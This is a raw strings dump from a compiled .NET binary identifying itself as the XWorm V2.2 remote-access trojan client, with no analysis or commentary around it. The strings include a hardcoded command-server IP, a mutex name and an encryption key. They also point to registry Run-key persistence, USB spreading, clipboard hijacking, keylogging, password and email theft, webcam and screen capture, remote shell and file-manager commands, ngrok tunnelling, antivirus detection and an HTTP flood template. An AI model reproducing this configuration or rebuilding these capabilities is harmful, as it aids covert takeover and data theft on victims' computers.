!This program cannot be run in DOS mode.
`.rsrc
@.reloc
(y
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Settings
ClientSocket
Messages
Helper
RemoteDesktop
AppendOutputTextDelegate
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
Mutexx
System.Threading
_appMutex
current
isConnected
System.Net.Sockets
Socket
BufferLength
BufferLengthReceived
Buffer
System.IO
MemoryStream
ManualResetEvent
allDone
SendSync
BeginConnect
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
System.Diagnostics
Process
_MyProcess
get_MyProcess
set_MyProcess
WithEventsValue
processid
AppendOutputText
DataReceivedEventArgs
MyProcess_ErrorDataReceived
sender
MyProcess_OutputDataReceived
WSound
mouse_event
dwFlags
cButtons
dwExtraInfo
user32
keybd_event
Thread
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
getFolders
location
getFiles
getDrives
Download
MyProcess
GetHashT
strToHash
frombase64
Plugin
AES_Encryptor
AES_Decryptor
INDATE
Comment
Antivirus
CreateMutex
CloseMutex
userAgents
IPHOST
PortHost
IsValid
Address
BitBlt
nXDest
nYDest
hdcSrc
gdi32.dll
System.Drawing
Capture
System.Drawing.Imaging
ImageCodecInfo
GetEncoderInfo
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
VB$AnonymousDelegate_0
_Lambda$__1
DebuggerDisplayAttribute
FileInfo
Exception
Environment
SpecialFolder
GetFolderPath
GetFileName
String
Concat
FileSystemInfo
FileAttributes
set_Attributes
ProjectData
SetProjectError
ClearProjectError
Interaction
Environ
ServerComputer
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
Microsoft.Win32
RegistryKey
get_CurrentUser
OpenSubKey
GetFileNameWithoutExtension
SetValue
ThreadStart
Random
WaitHandle
WaitOne
STAThreadAttribute
_Lambda$__2
_Lambda$__3
DebuggerStepThroughAttribute
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
Conversions
ToInteger
Connect
SocketFlags
EventWaitHandle
ComputerInfo
get_UserName
get_OSFullName
Replace
OperatingSystem
get_OSVersion
get_ServicePack
get_Is64BitOperatingSystem
Boolean
EndReceive
ToArray
ToLong
Stream
Dispose
WriteByte
get_Length
WaitCallback
ThreadPool
QueueUserWorkItem
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
IDisposable
Collect
_Closure$__1
$VB$Local_A
_Lambda$__6
_Lambda$__4
_Lambda$__5
DataReceivedEventHandler
remove_OutputDataReceived
remove_ErrorDataReceived
add_OutputDataReceived
add_ErrorDataReceived
Operators
AddObject
get_Data
System.Net
WebClient
StreamWriter
Bitmap
FileAttribute
Rectangle
ProcessStartInfo
DateTime
System.Collections
IEnumerator
Strings
CompareMethod
CompareString
System.Windows.Forms
Restart
SocketShutdown
Shutdown
NewLateBinding
LateCall
ChangeType
Screen
get_PrimaryScreen
get_Bounds
get_Size
ConcatenateObject
LateGet
Cursor
set_Position
Convert
ToBoolean
ToByte
UIntPtr
GetTempFileName
DownloadFile
CreateObject
LateSet
AppWinStyle
ToInt32
Exists
get_StartInfo
set_FileName
set_Arguments
set_UseShellExecute
set_RedirectStandardError
set_RedirectStandardOutput
set_CreateNoWindow
WaitForExit
set_RedirectStandardInput
get_Id
BeginErrorReadLine
BeginOutputReadLine
get_StartTime
get_StandardInput
TextWriter
WriteLine
GetProcesses
get_ProcessName
GetExtension
GetProcessById
Delete
Directory
FileSystemProxy
get_FileSystem
RenameDirectory
RenameFile
ReadAllText
GetThumbnailImageAbort
IntPtr
GetThumbnailImage
ImageFormat
get_Png
FileSystem
SetAttr
CreateDirectory
FileStream
Create
ReadAllBytes
ToBase64String
WriteAllBytes
GetTempPath
CopyDirectory
MoveDirectory
get_Audio
Registry
GetValue
IEnumerable
GetEnumerator
get_Current
MoveNext
Network
get_Network
MessageBox
DialogResult
UploadFile
DirectoryInfo
GetDirectories
get_Name
GetFiles
DriveInfo
System.Collections.Generic
IEnumerator`1
DriveType
System.Collections.ObjectModel
ReadOnlyCollection`1
get_Drives
get_DriveType
DllImportAttribute
avicap32.dll
user32.dll
AccessedThroughPropertyAttribute
MarshalAsAttribute
UnmanagedType
_Lambda$__7
System.Text
Encoding
get_Default
GetBytes
GetString
get_ProcessorCount
get_MachineName
get_SystemDirectory
GetPathRoot
get_TotalSize
System.Security.Cryptography
MD5CryptoServiceProvider
StringBuilder
get_ASCII
HashAlgorithm
ComputeHash
Append
Substring
ToUpper
FromBase64String
System.Reflection
Module
Assembly
GetModules
GetTypes
get_FullName
EndsWith
get_Assembly
RijndaelManaged
ICryptoTransform
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateEncryptor
TransformFinalBlock
CreateDecryptor
get_LastWriteTime
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Management
ManagementObjectSearcher
ManagementBaseObject
ManagementObjectCollection
ManagementObjectEnumerator
get_Item
get_DnsSafeHost
get_UTF8
EncoderParameter
EncoderParameters
Graphics
get_Width
get_Height
FromImage
FromHwnd
GetHdc
ReleaseHdc
Cursors
get_Position
op_Inequality
Encoder
Quality
get_Param
GetImageEncoders
get_MimeType
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
XWormClient
XWormClient.exe
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
MyProcess
WrapNonExceptionThrows
$8676214c-4828-4352-be17-a645bff0d60a
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
89.23.99.86
<123456789>
<Xwormmm>
USB.exe
9sFhtscMLr74lMX9
appdata
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft
Service Pack
XWorm V2.2
Error:
uninstall
update
Height
Memory
getinfo
openhide
internetexplorer.application
navigate
visible
shellfuc
regfuc
WScript.Shell
RegWrite
REG_DWORD
RunBotKiller
script
Cilpper
Clipper
injRun
startusb
startsp
PSleep
PreventSleep
taskkill.exe
/pid
CMD.EXE
Process Started at:
runnnnnn
closeshell
GetText
setText
clearr
BScreen
GetDrives
FileManager
Delete
Folder
Execute
Rename
txtttt
viewimage
hidefolderfile
showfolderfile
creatnewfolder
creatfile
downloadfile
downloadedfile
sendfileto
install
NETINS
7zip\7z.exe
InsProg
RSSDis
GETWCamPlu
GETWmicPlu
Wsound
GETWsoundPlu
JustFun
MapsPLU
closeKL
HKEY_CURRENT_USER\SOFTWARE\
GETTCP
GetActiveWindows
killAct
InstallN
InstallngC
\ngrok.exe
Getpass
Pvbnet
Emails
Error!
LLCHAT
[Folder]
FileManagerSplitFileManagerSplit
FileManagerSplit
[Drive]
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Err HWID
Class1
dd/MM/yyy
Nothing
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
image/jpeg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
XWormClient.exe
LegalCopyright
OriginalFilename
XWormClient.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0